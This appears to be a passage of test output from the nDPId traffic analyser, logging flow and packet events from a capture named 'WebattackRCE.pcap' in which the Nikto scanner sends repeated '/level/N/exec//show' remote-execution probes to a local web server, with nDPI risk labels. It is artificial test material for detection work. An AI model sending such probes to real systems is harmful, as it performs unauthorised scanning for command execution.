{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277633,"pkt":"AAAAAAAAAAAAAAAACABFAADIENVAAEAGK1l\/AAABfwAAAcZCH5APvynUeLRgIoAYAED+vAAAAQEICp1m\/qmdZv6oR0VUIC9sZXZlbC80OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277637,"pkt":"AAAAAAAAAAAAAAAACABFAADIJlxAAEAGFdJ\/AAABfwAAAcZEH5CFHB9c3vOX2IAYAED+vAAAAQEICp1m\/q2dZv6tR0VUIC9sZXZlbC80OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277639,"pkt":"AAAAAAAAAAAAAAAACABFAADIZI9AAEAG155\/AAABfwAAAcZGH5DAl12NotXkTIAYAED+vAAAAQEICp1m\/q+dZv6vR0VUIC9sZXZlbC81MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277642,"pkt":"AAAAAAAAAAAAAAAACABFAADIuMhAAEAGg2V\/AAABfwAAAcZIH5DuPYHFtiFXooAYAED+vAAAAQEICp1m\/rKdZv6yR0VUIC9sZXZlbC81MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277644,"pkt":"AAAAAAAAAAAAAAAACABFAADIp2FAAEAGlMx\/AAABfwAAAcZKH5BZVp5d6Tz88YAYAED+vAAAAQEICp1m\/rSdZv60R0VUIC9sZXZlbC81Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277646,"pkt":"AAAAAAAAAAAAAAAACABFAADIRMlAAEAG92R\/AAABfwAAAcZMH5Ck2n3FkPG1\/IAYAED+vAAAAQEICp1m\/radZv62R0VUIC9sZXZlbC81My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277648,"pkt":"AAAAAAAAAAAAAAAACABFAADIfG5AAEAGv79\/AAABfwAAAcZOH5Bk90VplsnARIAYAED+vAAAAQEICp1m\/ridZv64R0VUIC9sZXZlbC81NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277650,"pkt":"AAAAAAAAAAAAAAAACABFAADIGk5AAEAGIeB\/AAABfwAAAcZQH5A3JSNJK84\/noAYAED+vAAAAQEICp1m\/rmdZv65R0VUIC9sZXZlbC81NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277657,"pkt":"AAAAAAAAAAAAAAAACABFAADIqGlAAEAGk8R\/AAABfwAAAcZSH5BRNZFiv2NJXIAYAED+vAAAAQEICp1m\/sGdZv7AR0VUIC9sZXZlbC81Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277658,"pkt":"AAAAAAAAAAAAAAAACABFAADIKidAAEAGEgd\/AAABfwAAAcZUH5DRhBMk1ziDVIAYAED+vAAAAQEICp1m\/sKdZv7CR0VUIC9sZXZlbC81Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDQpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277660,"pkt":"AAAAAAAAAAAAAAAACABFAADI7vpAAEAGTTN\/AAABfwAAAcZWH5Ba4NgASBBLBYAYAED+vAAAAQEICp1m\/sSdZv7ER0VUIC9sZXZlbC81OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
